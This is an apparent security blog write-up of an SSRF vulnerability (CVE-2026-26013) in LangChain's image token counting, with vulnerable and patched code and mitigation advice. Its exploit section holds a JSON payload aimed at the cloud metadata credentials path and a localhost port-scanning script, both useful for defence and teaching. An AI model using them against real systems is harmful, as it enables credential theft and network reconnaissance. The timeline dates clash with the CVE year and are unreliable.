
CVE-2026-26013: When Your AI Assistant Browses Your Intranet

Amit Schendel
Senior Security Researcher

Feb 11, 2026 · 6 min read

Executive Summary (TL;DR)

LangChain's `ChatOpenAI` component contained an SSRF vulnerability in its token counting logic. To estimate costs for vision models, the library automatically fetched images from URLs provided in prompts. This allowed attackers to force the server to request internal resources (like AWS metadata or localhost). Fixed in `langchain-core` 1.2.11.

In the race to build the ultimate AI agent, developers often overlook the plumbing. CVE-2026-26013 is a classic Server-Side Request Forgery (SSRF) vulnerability nestled deep within LangChain's utility functions. Specifically, the logic used to calculate token costs for OpenAI's vision models inadvertently turned the library into an open proxy. By tricking the `ChatOpenAI` component into 'measuring' an image hosted on an internal server, attackers could force the application to scan local networks or ping cloud metadata services. It’s a stark reminder that even 'helper' functions need to treat user input like a biological hazard.

The Hook: The Price of Pixels

In the modern LLM economy, tokens are currency. Developers are obsessed with counting them before sending requests to OpenAI to avoid bankruptcy. Text is easy—just count the subwords. But images? Images are tricky.

OpenAI's GPT-4o and GPT-4-turbo vision models price images based on their dimensions. A 512x512 image costs fewer tokens than a 2048x2048 one. To help developers estimate these costs locally, LangChain introduced a convenience method: `get_num_tokens_from_messages()`.
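For context, OpenAI's documented high-detail image pricing works roughly like this. The sketch below is a minimal approximation of the published formula (the constants are OpenAI's documented values at the time of writing and may change), which shows why the library needs the actual pixel dimensions:

import math

def estimate_image_tokens(width: int, height: int) -> int:
    """Rough sketch of OpenAI's documented high-detail image pricing."""
    # Scale the image to fit within a 2048 x 2048 square
    scale = min(1.0, 2048 / max(width, height))
    width, height = int(width * scale), int(height * scale)
    # Then scale so the shortest side is at most 768 px
    scale = min(1.0, 768 / min(width, height))
    width, height = int(width * scale), int(height * scale)
    # 170 tokens per 512 px tile, plus a flat 85-token base cost
    tiles = math.ceil(width / 512) * math.ceil(height / 512)
    return 85 + 170 * tiles

print(estimate_image_tokens(512, 512))    # 255 tokens
print(estimate_image_tokens(2048, 2048))  # 765 tokens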

Here is the logic: If a user sends a prompt with an image URL, LangChain grabs the image, checks the height and width, and calculates the token cost. It sounds helpful, benign even. But from a security perspective, it's a nightmare. The library was effectively saying, "Give me a URL, and I will make a server-side HTTP request to it." In the security world, we call this a 'feature' right up until it becomes a CVE.
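To make that concrete, here is a minimal sketch of the call that triggers the fetch on vulnerable versions; the model name and image URL are placeholders:

from langchain_core.messages import HumanMessage
from langchain_openai import ChatOpenAI

chat = ChatOpenAI(model="gpt-4o")
message = HumanMessage(content=[
    {"type": "text", "text": "What is in this image?"},
    {"type": "image_url", "image_url": {"url": "https://example.com/cat.png"}},
])
# On vulnerable versions, this line issues a server-side GET for the image
token_count = chat.get_num_tokens_from_messages([message])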

The Flaw: Blind Trust

The vulnerability (CWE-918) stems from a lack of boundary checks in the `_url_to_size` helper function. When you pass a message history to the token counter, LangChain iterates through it. If it spots a `type: image_url` entry, it extracts the URL and immediately fires an HTTP GET request.

There was no whitelist. There was no blacklist. There was no check to see if the IP resolved to 127.0.0.1 or the infamous 169.254.169.254 (cloud metadata). The code assumed that if you are asking to count tokens for an image, you must be pointing to a valid, public image.

This is a classic blind SSRF scenario. While the attacker might not get the content of the response back (because the code tries to parse the response as an image using Pillow), the side effects are dangerous enough. The server performs the handshake, sends the headers, and downloads the body. This allows an attacker to map internal ports (based on response time), trigger internal APIs that act on GET requests, or perform Denial of Service by pointing the tokenizer at a 10GB file.

The Code: Autopsy of a Request

Let's look at the vulnerable code path in `libs/partners/openai/langchain_openai/chat_models/base.py`. The logic was devastatingly simple: it used `httpx` to fetch the resource without hesitation.

Vulnerable Implementation:

from io import BytesIO

import httpx
from PIL import Image

def _url_to_size(image_source: str) -> tuple[int, int] | None:
    # No validation. Just fetch.
    response = httpx.get(image_source)
    response.raise_for_status()
    # Pass the raw bytes to Pillow to read the dimensions
    return Image.open(BytesIO(response.content)).size

The fix, introduced in commit `2b4b1dc29a833d4053deba4c2b77a3848c834565`, is a lesson in defensive programming. The maintainers didn't just add a regex; they introduced a dedicated security module, `langchain_core._security._ssrf_protection`.

Fixed Implementation:

import httpx
from langchain_core._security._ssrf_protection import validate_safe_url

def _url_to_size(image_source: str) -> tuple[int, int] | None:
    try:
        # 1. Validate the URL before connecting
        validate_safe_url(image_source, allow_private=False, allow_http=True)

        # 2. Add a timeout to prevent hanging on slow endpoints
        with httpx.Client(timeout=5.0) as client:
            response = client.get(image_source)

        # 3. Check content size (50MB limit matching OpenAI)
        # ... (size checks) ...
    except (ValueError, httpx.RequestError):
        return None

The `validate_safe_url` function does the heavy lifting: it resolves the hostname via DNS (hardening against DNS rebinding attacks) and checks whether the resulting IP falls into private (RFC 1918), loopback, or link-local ranges, the last of which covers 169.254.169.254.
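The internals of that module aren't reproduced here, but conceptually the guard looks something like the following sketch (illustrative only, not the actual library code):

import ipaddress
import socket
from urllib.parse import urlparse

def validate_safe_url_sketch(url: str, *, allow_private: bool = False,
                             allow_http: bool = True) -> None:
    """Illustrative approximation of an SSRF guard; not the real module."""
    parsed = urlparse(url)
    allowed_schemes = {"http", "https"} if allow_http else {"https"}
    if parsed.scheme not in allowed_schemes:
        raise ValueError(f"Disallowed scheme: {parsed.scheme!r}")
    if not parsed.hostname:
        raise ValueError("URL has no hostname")
    # Resolve the hostname and vet every candidate address. Full rebinding
    # protection also requires pinning the validated IP for the actual request.
    for info in socket.getaddrinfo(parsed.hostname, parsed.port or 443):
        ip = ipaddress.ip_address(info[4][0])
        if not allow_private and (
            ip.is_private or ip.is_loopback or ip.is_link_local
        ):
            raise ValueError(f"URL resolves to a blocked address: {ip}")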

The Exploit: Poking the Bear

Exploiting this requires an application that allows user-controlled message history or uses an agent that processes external content. Imagine a "Receipt Scanner AI" that accepts image URLs.

The Attack Vector:

  1. Reconnaissance: The attacker identifies that the backend is using LangChain by analyzing error messages or behavior (e.g., precise token counts returned in debug logs).
  2. Payload Construction: The attacker crafts a request pretending to provide an image, but actually pointing to the AWS metadata service.
{
  "messages": [
    {
      "role": "user",
      "content": [
        {"type": "text", "text": "Analyze this receipt"},
        {
          "type": "image_url", 
          "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
        }
      ]
    }
  ]
}
  3. Trigger: The application calls `chat.get_num_tokens_from_messages(messages)` to check whether the prompt fits the context window.
  4. Execution: LangChain sends a GET request to the metadata IP.
  5. Result:
    • Best Case (for the Attacker): The application throws an error containing the response body: Error: cannot identify image file <AWS_CREDENTIALS_BLOB>. This leaks the credentials directly.
    • Blind Case: The application simply errors out or hangs. The attacker repeats the request against different ports (localhost:22, localhost:5432) to map the internal network topology from response latency, as sketched below.
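Scripting the blind case takes only a few lines. Everything below is hypothetical: the endpoint URL, request shape, and port list are assumptions about a target application, shown purely to illustrate the timing side channel:

import time
import httpx

TARGET = "https://victim.example.com/api/chat"  # hypothetical endpoint

def ssrf_payload(url: str) -> dict:
    return {"messages": [{"role": "user", "content": [
        {"type": "text", "text": "Analyze this receipt"},
        {"type": "image_url", "image_url": {"url": url}},
    ]}]}

for port in (22, 80, 5432, 6379):
    start = time.monotonic()
    try:
        httpx.post(TARGET, json=ssrf_payload(f"http://127.0.0.1:{port}/"),
                   timeout=30.0)
    except httpx.HTTPError:
        pass
    # A fast connection reset vs. a slow timeout hints at closed vs. filtered
    print(f"port {port}: {time.monotonic() - start:.2f}s")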

The Impact: Why Low Severity Still Hurts

The CVSS score is 3.7 (Low), primarily because the Confidentiality impact is rated None to Low depending on the specific implementation: since the function expects an image, it usually discards non-image data (like JSON from a metadata service) before the attacker sees it.

However, do not let the "Low" severity fool you. In a cloud environment, SSRF is a gateway drug. If an attacker can trigger requests from your backend, they can:

  1. Bypass Firewalls: Access internal admin panels (e.g., Jenkins, Kubernetes API) that are whitelisted for the server's IP.
  2. Cloud Enumeration: Even blind SSRF can confirm the existence of specific IAM roles or instance configurations.
  3. Denial of Service: By pointing the URL at a resource that returns an endless stream of data (like `/dev/urandom` exposed over HTTP), they can exhaust the memory of the Python process attempting to load it into `BytesIO` (see the sketch below).
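That last vector also points to the general mitigation: stream the body and enforce a hard cap instead of buffering blindly. Here is a minimal defensive sketch with `httpx` (the 50MB constant mirrors the limit referenced in the patch):

import httpx

MAX_BYTES = 50 * 1024 * 1024  # cap mirroring OpenAI's image size limit

def bounded_fetch(url: str) -> bytes:
    """Download at most MAX_BYTES, aborting oversized responses early."""
    chunks, total = [], 0
    with httpx.Client(timeout=5.0) as client:
        with client.stream("GET", url) as response:
            response.raise_for_status()
            for chunk in response.iter_bytes():
                total += len(chunk)
                if total > MAX_BYTES:
                    raise ValueError("Response exceeds size cap")
                chunks.append(chunk)
    return b"".join(chunks)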

The Fix: Locking Down the Library

Remediation is straightforward but urgent: update `langchain-core` to version 1.2.11 or higher. The patch includes robust SSRF protections that are enabled by default.
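For example, with pip:

pip install --upgrade "langchain-core>=1.2.11"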

If you cannot upgrade immediately, or if you are paranoid (which you should be), you can disable this behavior entirely in your code:

# explicitly disable fetching
token_count = chat.get_num_tokens_from_messages(
    messages, 
    allow_fetching_images=False
)

This flag forces LangChain to skip the download and use a default/fallback calculation for token usage, preventing the network request altogether. It makes your token counts slightly less accurate for images, but it keeps your internal network private. A worthy trade-off.


Technical Appendix

CVSS Score: 3.7 / 10 (Low)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Probability: 0.04% (top 89% most exploited)

Affected Systems

  • LangChain Framework (Python)
  • Applications using `ChatOpenAI` with vision models
  • Internal networks accessible by LLM servers

Affected Versions Detail

Product: langchain-core (LangChain AI)
Affected Versions: < 1.2.11
Fixed Version: 1.2.11
CWE ID: CWE-918
Attack Vector: Network
CVSS v3.1: 3.7 (Low)
Impact: Blind SSRF, Internal Scanning
Vulnerable Method: `get_num_tokens_from_messages`
Fix Commit: `2b4b1dc29a833d4053deba4c2b77a3848c834565`
CWE-918: Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing an attacker to coerce the application into sending a crafted request to an unexpected destination.

Vulnerability Timeline

  • Patch Commit Merged: 2024-05-21
  • Advisory Published: 2024-05-22
